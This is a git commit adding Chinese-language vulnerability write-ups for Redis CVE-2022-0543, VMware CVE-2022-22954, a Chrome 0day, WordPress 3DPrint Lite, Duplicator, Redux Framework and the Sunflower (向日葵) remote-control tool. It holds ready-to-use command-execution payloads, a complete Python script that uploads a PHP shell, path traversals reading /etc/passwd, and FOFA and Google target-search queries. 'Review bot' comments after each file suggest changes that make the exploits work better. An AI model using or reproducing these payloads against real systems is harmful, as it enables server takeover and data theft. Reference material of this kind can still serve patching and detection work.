Update vulnerability library: server application vulnerabilities/

Threekiii 2022-05-24 13:56:53 +08:00
parent ad23dd912c
commit 4eed2213ef
7 changed files with 497 additions and 0 deletions

@ -0,0 +1,23 @@
# Redis Lua 沙箱绕过 远程命令执行 CVE-2022-0543
## 漏洞描述
Redis是著名的开源Key-Value数据库其具备在沙箱中执行Lua脚本的能力。
Debian以及Ubuntu发行版的源在打包Redis时在Lua沙箱中遗留了一个对象package攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数进而逃逸沙箱执行任意命令。
## 漏洞影响
```
只限于Debian和Debian派生的Linux发行版如Ubuntu上的Redis服务
```
## 漏洞复现
远程连接Redis, 执行POC
```
eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("whoami", "r"); local res = f:read("*a"); f:close(); return res' 0
```
![image-20220524131958982](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241320211.png)
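Review bot: the 漏洞影响 block names only Debian and Debian-derived distributions and gives no package versions, so a reader cannot tell a patched host from an exposed one; add the fixed Debian/Ubuntu redis package versions there. In the PoC, the path `/usr/lib/x86_64-linux-gnu/liblua5.1.so.0` is the multiarch location for amd64 only, so say that it changes on other architectures and that `package.loadlib` returning nil means the path is wrong rather than the host being patched (on a patched build `package` itself is nil and the `eval` errors out before loadlib is reached). The reproduction step `远程连接Redis, 执行POC` should also state the precondition that the connection is unauthenticated or already authenticated with `AUTH`, since `eval` is an ordinary command and nothing in the payload bypasses authentication.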

@ -0,0 +1,33 @@
# VMware Workspace ONE Access SSTI漏洞 CVE-2022-22954
## 漏洞描述
VMware Workspace ONE Access以前称为VMware Identity Manager旨在通过多因素身份验证、条件访问和单点登录让您的员工更快地访问SaaS、Web和本机移动应用程序。其中的CVE-2022-22954是一个匿名服务器模板注入漏洞未经身份验证的攻击者可以利用此漏洞进行远程任意代码执行。
## 漏洞影响
```
VMware Workspace ONE Access Appliance 版本号20.10.0.0 20.10.0.1 21.08.0.0 21.08.0.1
VMware Identity Manager Appliance 版本号3.3.3 3.3.4 3.3.5 3.3.6
VMware Realize Automation 版本号7.6
```
## FOFA
```
app="vmware-Workspace-ONE-Access"
```
## 漏洞复现
登录页面
![image-20220524132528721](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241325815.png)
验证POC
```
/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d
```
![image-20220524132657968](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241326167.png)
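Review bot: `VMware Realize Automation 版本号7.6` in the 漏洞影响 block misnames the product; it is vRealize Automation 7.6. The PoC under 验证POC is shown only URL-encoded, so add the decoded form of the `deviceUdid` value, `${"freemarker.template.utility.Execute"?new()("cat /etc/passwd")}`, after the code block; that makes it visible that this is FreeMarker template injection through the `deviceUdid` parameter of `/catalog-portal/ui/oauth/verify` and tells the reader which part to replace with their own command. The empty `error=` parameter should also be mentioned as required by the route rather than left unexplained.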

@ -4,6 +4,14 @@
Windows Chrome 0day 在 2021-4-13 被公开 Windows Chrome 0day 在 2021-4-13 被公开
该漏洞未绕过沙箱,需要关闭沙箱才能成功弹出计算器
```
# 关闭沙箱
右键图标-->属性,然后在目标后面加上 -no-sandbox
点击确认
```
## 漏洞影响 ## 漏洞影响
``` ```
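Review bot: the added 关闭沙箱 block tells the reader to append `-no-sandbox` to the shortcut target, but the surrounding text never identifies the bug; it only says a Windows Chrome 0day was published on 2021-4-13 and that it does not escape the sandbox. Put the CVE or Chromium bug identifier next to that date line, and make the precondition explicit: the calculator only pops because the sandbox was disabled by hand, so the PoC demonstrates renderer-process code execution, not a full chain, and a default Chrome installation is not compromised by it as-is.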

@ -0,0 +1,123 @@
# WordPress 3DPrint Lite 3dprint-lite-functions.php 任意文件上传漏洞
## 漏洞描述
WordPress 3DPrint Lite Version 1.9.1.4 版本 中的 3dprint-lite-functions.php 文件存在文件上传漏洞,攻击者通过构造请求包可以上传任意文件获取服务器权限
## 漏洞影响
```
3DPrint Lite Version 1.9.1.4 版本
```
## 插件名
3DPrint Lite
https://downloads.wordpress.org/plugin/3dprint-lite.1.9.1.4.zip
## 漏洞复现
首先看一下插件注册的接口
![1638590530183-dbba3790-04d8-4567-bf1e-2f49629a9911](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241329738.png)
```
if ( is_admin() ) {
add_action( 'admin_enqueue_scripts', 'p3dlite_enqueue_scripts_backend' );
add_action( 'wp_ajax_p3dlite_handle_upload', 'p3dlite_handle_upload' );
add_action( 'wp_ajax_nopriv_p3dlite_handle_upload', 'p3dlite_handle_upload' );
include 'includes/3dprint-lite-admin.php';
}
else {
add_action( 'wp_enqueue_scripts', 'p3dlite_enqueue_scripts_frontend' );
include 'includes/3dprint-lite-frontend.php';
}
```
跟踪 p3dlite_handle_upload 方法 `wp-content/plugins/3dprint-lite/includes/3dprint-lite-functions.php`
![2](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241331648.png)
向下看可以看到一个标准的文件上传代码
![3](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241331787.png)
通过调试可以找到上传路径 `/wp-content/uploads/p3d/`
![image-20220524133048318](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241330351.png)
未授权调用 p3dlite_handle_upload 上传文件
```
# Exploit Title: Wordpress Plugin 3DPrint Lite 1.9.1.4 - Arbitrary File Upload
# Google Dork: inurl:/wp-content/plugins/3dprint-lite/
# Date: 22/09/2021
# Exploit Author: spacehen
# Vendor Homepage: https://wordpress.org/plugins/3dprint-lite/
# Version: <= 1.9.1.4
# Tested on: Ubuntu 20.04.1
import os.path
from os import path
import json
import requests;
import sys
def print_banner():
print("3DPrint Lite <= 1.9.1.4 - Arbitrary File Upload")
print("Author -> spacehen (www.github.com/spacehen)")
def print_usage():
print("Usage: python3 exploit.py [target url] [php file]")
print("Ex: python3 exploit.py https://example.com ./shell.php")
def vuln_check(uri):
response = requests.get(uri)
raw = response.text
if ("jsonrpc" in raw):
return True;
else:
return False;
def main():
print_banner()
if(len(sys.argv) != 3):
print_usage();
sys.exit(1);
base = sys.argv[1]
file_path = sys.argv[2]
ajax_action = 'p3dlite_handle_upload'
admin = '/wp-admin/admin-ajax.php';
uri = base + admin + '?action=' + ajax_action ;
check = vuln_check(uri);
if(check == False):
print("(*) Target not vulnerable!");
sys.exit(1)
if( path.isfile(file_path) == False):
print("(*) Invalid file!")
sys.exit(1)
files = {'file' : open(file_path)}
print("Uploading Shell...");
response = requests.post(uri, files=files)
file_name = path.basename(file_path)
if(file_name in response.text):
print("Shell Uploaded!")
if(base[-1] != '/'):
base += '/'
print(base + "wp-content/uploads/p3d/" + file_name);
else:
print("Shell Upload Failed")
sys.exit(1)
main();
```
![4](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241331913.png)
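Review bot: the write-up says the call is 未授权 but never says why, and the hook registration it quotes explains it: `add_action( 'wp_ajax_nopriv_p3dlite_handle_upload', 'p3dlite_handle_upload' );` sits inside `if ( is_admin() )`, and `is_admin()` is true for any request to `wp-admin/admin-ajax.php` whether or not the user is logged in, so the `nopriv` hook is reachable anonymously. Spell that out after the first code block, and instead of calling the handler 标准的文件上传代码, name the checks it lacks (nonce, capability check, extension allow-list), since that is what makes the upload arbitrary. In the exploit, `vuln_check` only tests for the string `jsonrpc` in a GET response, which shows the action is routed but not that an upload will succeed, and `files = {'file' : open(file_path)}` opens the payload in text mode; `open(file_path, 'rb')` is the correct form for anything that is not plain text.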

@ -0,0 +1,76 @@
# WordPress Duplicator duplicator.php 任意文件读取漏洞 CVE-2020-11738
## 漏洞描述
WordPress Duplicator插件由于对文件下载没有进行验证则导致了任意文件读取漏洞
## 漏洞影响
```
Duplicator <= v1.3.26
```
## 插件名
Duplicator
https://downloads.wordpress.org/plugin/duplicator.1.3.26.zip
## 漏洞复现
首先先查看注册的无需授权的action接口 `wp-content/plugins/duplicator/ctrls/class.web.services.php`
![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241332267.png)
这里 `wp_ajax_nopriv_duplicator_download` 对应的函数名为 duplicator_download
![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241332007.png)
```
public static function duplicator_download() {
$file = sanitize_text_field($_GET['file']);
$filepath = DUPLICATOR_SSDIR_PATH.'/'.$file;
// Process download
if(file_exists($filepath)) {
// Clean output buffer
if (ob_get_level() !== 0 && @ob_end_clean() === FALSE) {
@ob_clean();
}
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="'.basename($filepath).'"');
header('Expires: 0');
header('Cache-Control: must-revalidate');
header('Pragma: public');
header('Content-Length: ' . filesize($filepath));
flush(); // Flush system output buffer
try {
$fp = @fopen($filepath, 'r');
if (false === $fp) {
throw new Exception('Fail to open the file '.$filepath);
}
while (!feof($fp) && ($data = fread($fp, DUPLICATOR_BUFFER_READ_WRITE_SIZE)) !== FALSE) {
echo $data;
}
@fclose($fp);
} catch (Exception $e) {
readfile($filepath);
}
exit;
} else {
wp_die('Invalid installer file name!!');
}
}
```
可以看到这里接受参数 file拼接至 $filepath 中,通过调试可以得知
DUPLICATOR_SSDIR_PATH 为 wp-snapshots 目录file可控且没有过滤导致任意文件读取
```
/wp-admin/admin-ajax.php?action=duplicator_download&file=../../../../../etc/passwd
```
![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241334750.png)
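Review bot: the explanation at `可以看到这里接受参数 file拼接至 $filepath 中` should name the actual defect: `sanitize_text_field()` strips tags and control characters but leaves `../` untouched, so `$filepath = DUPLICATOR_SSDIR_PATH.'/'.$file;` resolves outside `wp-snapshots`, and the only gate before the file is streamed is `file_exists($filepath)`. State that explicitly, and put the fixed plugin version next to `Duplicator <= v1.3.26` so the affected range is bounded. The PoC path is relative to the `wp-snapshots` directory; say so, and note that surplus `../` segments are harmless once the root is reached, so the five shown work for a typical install.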

@ -0,0 +1,195 @@
# WordPress Redux Framework class-redux-helpers.php 敏感信息泄漏漏洞 CVE-2021-38314
## 漏洞描述
2021年8月爆出Redux Framework存在未授权的敏感信息泄露漏洞CVE编号为CVE-2021-38314影响v4.2.11及以下版本,发送特定的请求包可以在未授权的情况下获取服务器敏感信息
## 漏洞影响
```
Redux Framework <= v4.2.11
```
## 插件名
Redux Framework
https://github.com/reduxframework/redux-framework
## 漏洞复现
影响范围为 v4.211 以下, 看一下版本间的更新差异
![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241336913.png)
这里将 add_action 注册的函数都删除掉了,本地安装查看函数相关代码
![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241337021.png)
```
$support_hash = md5( md5( Redux_Functions_Ex::hash_key() . '-redux' ) . '-support' );
add_action( 'wp_ajax_nopriv_' . $support_hash, array( 'Redux_Helpers', 'support_args' ) );
add_action( 'wp_ajax_' . $support_hash, array( 'Redux_Helpers', 'support_args' ) );
$hash_arg = md5( trailingslashit( network_site_url() ) . '-redux' );
add_action( 'wp_ajax_nopriv_' . $hash_arg, array( 'Redux_Helpers', 'hash_arg' ) );
add_action( 'wp_ajax_' . $hash_arg, array( 'Redux_Helpers', 'hash_arg' ) );
add_action( 'wp_ajax_redux_support_hash', array( 'Redux_Functions', 'support_hash' ) );
add_filter( 'redux/tracking/options', array( 'Redux_Helpers', 'redux_stats_additions' ) );
```
查看 add_action 注册的函数 hash_arg() 和 support_args()
```
public static function hash_arg() {
echo esc_html( md5( Redux_Functions_Ex::hash_key() . '-redux' ) );
die();
}
public static function support_args() {
header( 'Expires: Mon, 26 Jul 1997 05:00:00 GMT' );
header( 'Last-Modified: ' . gmdate( 'D, d M Y H:i:s' ) . 'GMT' );
header( 'Expires: Sat, 26 Jul 1997 05:00:00 GMT' );
header( 'Cache-Control: no-store, no-cache, must-revalidate' );
header( 'Cache-Control: post-check=0, pre-check=0', false );
header( 'Pragma: no-cache' );
$instances = Redux::all_instances();
if ( isset( $_REQUEST['i'] ) && ! empty( $_REQUEST['i'] ) ) { // phpcs:ignore WordPress.Security.NonceVerification
if ( is_array( $instances ) && ! empty( $instances ) ) {
foreach ( $instances as $opt_name => $data ) {
if ( md5( $opt_name . '-debug' ) === $_REQUEST['i'] ) { // phpcs:ignore WordPress.Security.NonceVerification
$array = $data;
}
}
}
if ( isset( $array ) ) {
// We only want the extension names and versions.
$array->extensions = self::get_extensions( $opt_name );
$to_return = array();
// Filter out all the unwanted data.
foreach ( $array as $key => $value ) {
if ( in_array(
$key,
array(
// 'fields',
'extensions',
'sections',
'args',
// 'field_types'
),
true
) ) {
$to_return[ $key ] = $value;
} else { // phpcs:ignore Generic.CodeAnalysis.EmptyStatement
// phpcs:ignore Squiz.PHP.CommentedOutCode
/* echo $key.PHP_EOL; */
}
}
$array = $to_return;
} else {
die();
}
} else {
$array = self::get_statistics_object();
if ( is_array( $instances ) && ! empty( $instances ) ) {
$array['instances'] = array();
foreach ( $instances as $opt_name => $data ) {
$array['instances'][] = $opt_name;
}
}
$array['key'] = md5( Redux_Functions_Ex::hash_key() );
}
ksort( $array ); // Let's make that pretty.
// phpcs:ignored WordPress.PHP.NoSilencedErrors, WordPress.Security.EscapeOutput
echo @htmlspecialchars( @wp_json_encode( $array, true ), ENT_QUOTES );
die();
}
```
support_args() 函数 $_REQUEST['i'] 为空,来到另一处分支
```
} else {
$array = self::get_statistics_object();
if ( is_array( $instances ) && ! empty( $instances ) ) {
$array['instances'] = array();
foreach ( $instances as $opt_name => $data ) {
$array['instances'][] = $opt_name;
}
}
$array['key'] = md5( Redux_Functions_Ex::hash_key() );
}
```
跟踪 get_statistics_object() 函数,该函数可以获取插件等环境变量信息
![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241337236.png)
可以看到该函数 为 `wp_ajax_nopriv_*` 可未授权调用
![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241337688.png)
其中需要变量 $support_hash, 跟踪 hash_key() 方法
```
$support_hash = md5( md5( Redux_Functions_Ex::hash_key() . '-redux' ) . '-support' );
```
![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241337002.png)
wp-config.php 中存在 AUTH_KEY 参数,为随机值
![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241337166.png)
回到 hash_arg() 函数
![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241338129.png)
```
public static function hash_arg() {
echo esc_html( md5( Redux_Functions_Ex::hash_key() . '-redux' ) );
die();
}
```
这里就调用到了 Redux_Functions_Ex::hash_key() 中的函数,且返回 md5值
回到刚刚的代码中,可以发现得到的结果同样也是 $support_hash 我们所需要知道的参数,下面为等价替换
```
$support_hash = md5(hash_arg(). '-support' );
```
![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241338081.png)
这样我们就获取到了一个利用链
```
$hash_arg = md5( trailingslashit( network_site_url() ) . '-redux' );
add_action( 'wp_ajax_nopriv_' . $hash_arg, array( 'Redux_Helpers', 'hash_arg' ) );
|
获取 md5( Redux_Functions_Ex::hash_key() . '-redux') 值
|
$support_hash = md5( md5( Redux_Functions_Ex::hash_key() . '-redux' ) . '-support' );
add_action( 'wp_ajax_nopriv_' . $support_hash, array( 'Redux_Helpers', 'support_args' ) );
|
调用函数 support_args 获取系统敏感信息
```
![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241338421.png)
![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241338050.png)
![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241338052.png)
![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241338807.png)
成功获取到了插件版本等有关信息
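Review bot: `影响范围为 v4.211 以下` under 漏洞复现 drops a dot and should read v4.2.11 to match `Redux Framework <= v4.2.11` in 漏洞影响. The chain diagram is also missing its first step: `$hash_arg = md5( trailingslashit( network_site_url() ) . '-redux' );` depends only on the public site URL, so an anonymous client computes it, calls `admin-ajax.php?action=<hash_arg>` to obtain `md5( hash_key() . '-redux' )`, and then computes `md5( <that> . '-support' )` to reach `support_args`. Finally, the write-up only follows the branch where `$_REQUEST['i']` is empty; that response includes `instances` (the option names), and `i=md5( $opt_name . '-debug' )` returns each instance's `sections`, `args` and `extensions` through the first branch, which is a larger leak than the statistics object. One sentence after 成功获取到了插件版本等有关信息 would cover it.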

@ -0,0 +1,39 @@
# 向日葵 check 远程命令执行漏洞 CNVD-2022-10270
## 漏洞描述
向日葵通过发送特定的请求获取CID后可调用 check接口实现远程命令执行导致服务器权限被获取
## 漏洞影响
```
11.0.0.33162
```
## FOFA
```
body="Verification failure"
```
## 漏洞复现
向日葵在开启后会默认在 40000-65535 之间开启某端口
![image-20220524135408561](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241354598.png)
发送请求获取CID
```
/cgi-bin/rpc?action=verify-haras
```
![image-20220524135428094](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241354132.png)
使用获取到的 verify_string 作为 cookie的 CID字段进行命令执行
```
/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+ipconfig
```
![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205241354108.png)
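Review bot: the 漏洞影响 block lists a single build, `11.0.0.33162`, with no product edition, platform or range, while the PoC only works on Windows (it walks to `windows/system32/WindowsPowerShell/v1.0/powershell.exe`); state the edition and platform and whether earlier builds are affected. The step `使用获取到的 verify_string 作为 cookie的 CID字段进行命令执行` never shows the header, so add `Cookie: CID=<verify_string>` next to the `/check?cmd=` line. The payload shape also needs a sentence: the value starts with `ping`, then `../` components walk from the directory the service runs commands in to powershell.exe, and the part after `+` is the command that actually executes; as written the reader has to guess why the traversal is there and what to change.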